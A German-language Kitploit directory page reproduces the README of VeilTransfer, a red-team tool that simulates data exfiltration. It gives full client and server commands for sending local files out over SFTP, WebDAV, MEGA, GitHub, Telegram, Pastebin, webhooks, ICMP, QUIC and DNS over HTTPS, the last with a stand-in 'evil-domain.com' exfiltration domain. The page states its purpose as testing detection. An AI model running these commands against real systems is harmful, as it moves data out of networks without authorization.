Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
VeilTransfer — VeilTransfer ist ein Daten-Exfiltrationstool, das dazu entwickelt wurde, die Erkennungsfähigkeiten zu testen und zu verbessern. Dieses Tool simuliert reale Daten-Exfiltrationstechniken, die von fortschrittlichen Bedrohungsakteuren verwendet werden, und ermöglicht es Organisationen, ihre Sicherheitslage zu bewerten und zu verbessern. | Kitploit
Tools/GitHubGitHub/infosecn1nja/veiltransfer
DatenexfiltrationNetzwerksicherheitPenetrationstestsRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

VeilTransfer ist ein Daten-Exfiltrationstool, das dazu entwickelt wurde, die Erkennungsfähigkeiten zu testen und zu verbessern. Dieses Tool simuliert reale Daten-Exfiltrationstechniken, die von fortschrittlichen Bedrohungsakteuren verwendet werden, und ermöglicht es Organisationen, ihre Sicherheitslage zu bewerten und zu verbessern.

1572216vor 9 MonatenVon Kitploit geprüft
Teilen
# VeilTransfer 2.0

VeilTransfer ist ein Datenerfiltrations-Tool, das entwickelt wurde, um Erkennungsfähigkeiten zu testen und zu verbessern. Dieses Tool simuliert reale Datenerfiltrations-Techniken, die von fortgeschrittenen Bedrohungsakteuren verwendet werden, und ermöglicht es Organisationen, ihre Sicherheitslage zu bewerten und zu verbessern. Durch die Nutzung mehrerer Exfiltrationsmethoden wie MEGA, GitHub, SFTP, WebDAV und mehr hilft VeilTransfer dabei, Lücken in Ihren Abwehrmaßnahmen zu identifizieren und stellt sicher, dass Ihre Sicherheitslösungen darauf vorbereitet sind, modernen Datenschutzverletzungen entgegenzuwirken.

## Unterstützte Exfiltrationsmethoden

- MEGA
- GitHub
- Dropbox
- Telegram
- Pastebin
- WebDAV
- Webhook
- SFTP
- FTP
- DoH (DNS over HTTPS)
- QUIC
- ICMP

## MITRE ATT&CK-Zuordnung

|ID|Techniken|
|--|---------|
|T1029|Geplante Übertragung|
|T1020|Automatisierte Exfiltration|
|T1132.001|Datenkodierung: Standardkodierung|
|T1560.002|Gesammelte Daten archivieren: Archivierung über Bibliothek|
|T1567.001|Exfiltration über Webdienst: Exfiltration in Code-Repository|
|T1567.002|Exfiltration über Webdienst: Exfiltration in Cloud-Speicher|
|T1567.003|Exfiltration über Webdienst: Exfiltration in Textspeicher|Sites|
|T1567.004|Exfiltration über Webdienst: Exfiltration über Webhook|
|T1048.003|Exfiltration über alternatives Protokoll: Exfiltration über unverschlüsseltes Nicht-C2-Protokoll|
|T1048.002|Exfiltration über alternatives Protokoll: Exfiltration über asymmetrisch verschlüsseltes Nicht-C2-Protokoll|

## Zusätzliche Funktionen

### Erzeugung von Fake-Daten
VeilTransfer unterstützt auch die Erzeugung von Fake-Daten, einschließlich:

- **Indonesia Identity Card (KTP)-Nummern:** Generieren Sie realistische KTP-Nummern und zugehörige Daten.
- **Kreditkarteninformationen:** Erstellen Sie gefälschte Kreditkartendaten im PCI-DSS-Format, einschließlich Vorname, Nachname, CCN (Visa/MasterCard/AMEX) und Ablaufdatum.
- **Social Security Numbers (SSN):** Generieren Sie gefälschte SSNs für die Verwendung in Simulationen und Testumgebungen.
- **Krankenakten:** Generieren Sie gefälschte Krankenaktdaten auf Indonesisch (id) oder Englisch (en).

### Erstellung von Zip-Daten
Erstellen Sie einfach Zip-Dateien zum Bündeln und Komprimieren von Daten, die dann für die Exfiltration oder zum Testen verschiedener Szenarien verwendet werden können. Unterstützt optional die Aufteilung in mehrere Dateien basierend auf der Größe.

## Beispielhafte Anwendungsfälle
* **Red-Team-Operationen:** Setzen Sie VeilTransfer während Red-Team-Übungen ein, um Blue Teams mit anspruchsvollen und realistischen Exfiltrationsszenarien herauszufordern.
* **Purple Teaming:** Arbeiten Sie mit Ihren Verteidigungsteams zusammen, um Exfiltrationsversuche zu simulieren und anschließend zu erkennen, und verfeinern Sie sowohl offensive als auch defensive Taktiken.
* **Sicherheitstests:** Verwenden Sie VeilTransfer, um die Wirksamkeit von DLP, NDR, Firewalls und anderen Netzwerksicherheitsmaßnahmen zu validieren.

## Beispielhafte Verwendung

### Übertragung

#### Übertragen einer Datei über SFTP
Dieses Beispiel zeigt, wie eine Datei mithilfe des SFTP-Protokolls sicher an einen entfernten Server übertragen wird. Die Datei befindet sich auf dem lokalen Rechner und wird mithilfe der SSH-Authentifizierung in das angegebene entfernte Verzeichnis übertragen.
```bash
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass
```

#### Übertragen von Dateien an einen WebDAV-Server
In diesem Beispiel werden Dateien aus einem lokalen Verzeichnis auf einen WebDAV-Server hochgeladen. Der Server erfordert für die Authentifizierung einen Benutzernamen und ein Passwort. Der Serverparameter enthält das URI-Schema (https:// oder http://).
```bash
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass
```

#### Übertragen von Dateien an Mega Cloud
Dieses Beispiel zeigt, wie Dateien an den Mega-Cloud-Speicher übertragen werden. Die Dateien werden aus einem angegebenen lokalen Verzeichnis hochgeladen, und die Authentifizierung erfolgt über die Mega-Cloud-Anmeldedaten des Benutzers.
```bash
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword
```

#### Übertragen von Dateien über FTP
In diesem Beispiel wird eine Datei auf einen FTP-Server hochgeladen. Die Datei wird in ein bestimmtes Verzeichnis auf dem entfernten Server übertragen. Der Server erfordert für die Authentifizierung einen Benutzernamen und ein Passwort.
```bash
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword
```

#### Hochladen einer Datei auf Pastebin
Dieses Beispiel zeigt, wie der Inhalt einer Datei auf Pastebin hochgeladen wird. Der Inhalt wird mithilfe eines vom Benutzer bereitgestellten API-Schlüssels auf Pastebin veröffentlicht.
```bash
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key
```

#### Senden einer Datei an ein GitHub-Repository
Dieses Beispiel zeigt, wie eine Datei vom lokalen Rechner in ein bestimmtes GitHub-Repository übertragen wird. Die Datei wird mithilfe des GitHub-API-Tokens des Benutzers zur Authentifizierung zum Repository hinzugefügt.
```bash
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token
```

#### Senden einer Datei an einen Telegram-Kanal
Dieses Beispiel zeigt, wie eine Datei an einen bestimmten Telegram-Kanal gesendet wird. Die Datei wird mithilfe eines Telegram-Bot-API-Tokens gesendet, und die Nachricht wird an die angegebene Kanal-ID zugestellt.
```bash
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789
```

#### Senden von Daten an eine Webhook-URL
In diesem Beispiel wird der Inhalt einer Datei an eine angegebene Webhook-URL gesendet.
```bash
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url
```

#### Übertragen von Dateien über DoH (DNS over HTTPS)

Um einen sicheren Datenerfiltrationsmechanismus mithilfe von DNS over HTTPS (DoH) einzurichten, müssen die folgenden DNS-Einträge konfiguriert werden:

1. A-Eintrag: Zeigen Sie test auf die IP-Adresse <VeilTransfer_IP_Address>.

   test -> <VeilTransfer_IP_Address>

2. NS-Eintrag: Definieren Sie eine Subdomain (exfil), die von evil-domain.com verwaltet wird.

   exfil -> test.evil-domain.com

Die Domäne exfil.evil-domain.com dient als DNS-Exfil-Domäne.

Starten Sie dann den VeilTransfer-Server im DoH-Modus mit dem folgenden Befehl:
```bash
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil
```
Hinweis: Der Verschlüsselungsschlüssel (-key) muss 16 oder 32 Zeichen lang sein.

Um Dateien über DoH hochzuladen, stellen Sie sicher, dass der VeilTransfer-Server mit einem gültigen Verschlüsselungsschlüssel aktiv im DoH-Modus läuft. Starten Sie dann die Übertragung mit dem Client-Befehl:
```bash
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com
```

#### Übertragen von Dateien über QUIC
Um den VeilTransfer-Server im QUIC-Modus zu starten, verwenden Sie den folgenden Befehl:
```bash
veiltransfer_server quic -cert /path/server.crt -key /path/server.key
```

Sobald der Server läuft, können Sie Dateien oder Verzeichnisse hochladen mit:
```bash
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443
```

#### Übertragen von Dateien über ICMP
Um Dateiübertragungen über das ICMP-Protokoll zu ermöglichen, starten Sie den VeilTransfer-Server im ICMP-Modus, indem Sie den folgenden Befehl ausführen:
```bash
veiltransfer_server_linux icmp -folder /path/folder
```
Sobald der Server aktiv ist, führen Sie den folgenden Befehl aus, um Dateien oder Verzeichnisse über ICMP zu übertragen:
```bash
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>
```

### Zip-Dateien erstellen

#### Erstellen einer einfachen Zip-Datei
Erstellt ein Zip-Archiv aus einem angegebenen Verzeichnis.
```bash
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip
```

#### Erstellen einer aufgeteilten Zip-Datei
Erstellt ein Zip-Archiv, das basierend auf der angegebenen Größe in mehrere Teile aufgeteilt wird.
```bash
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000
```

### Datengenerator

#### Generieren von 100 gefälschten Kreditkartennummern
Dieses Beispiel zeigt, wie 100 Einträge gefälschter Kreditkartendaten generiert werden. Die generierten Daten enthalten Kreditkartennummern, Ablaufdaten und zugehörige Details.
```bash
veiltransfer_client generate-fake -ccn -count 100
```

#### Generieren von 50 gefälschten indonesischen KTP-Einträgen
Dieses Beispiel zeigt, wie 50 Einträge gefälschter KTP-Daten generiert werden, bei denen es sich um indonesische Personalausweise handelt. Die Daten enthalten persönliche Informationen wie Name, Adresse und KTP-Nummer.
```bash
veiltransfer_client generate-fake -ktp -count 50
```

#### Generieren von 200 gefälschten Social Security Numbers
Die generierten Daten enthalten Social Security Numbers, die nach US-amerikanischen Standards formatiert sind.
```bash
veiltransfer_client generate-fake -ssn -count 200
```

#### Generieren von 300 gefälschten Krankenakten auf Englisch
Dieses Beispiel zeigt, wie 300 gefälschte Krankenakten auf Englisch generiert werden.
```bash
veiltransfer_client generate-fake -medical-record -count 300 -language en
```

## Mitwirken
Beiträge zu VeilTransfer sind willkommen! Wenn Sie Ideen für neue Funktionen, Exfiltrationsmethoden oder Verbesserungen haben, reichen Sie bitte einen Pull-Request ein oder eröffnen Sie ein Issue auf GitHub.
Tool herunterladen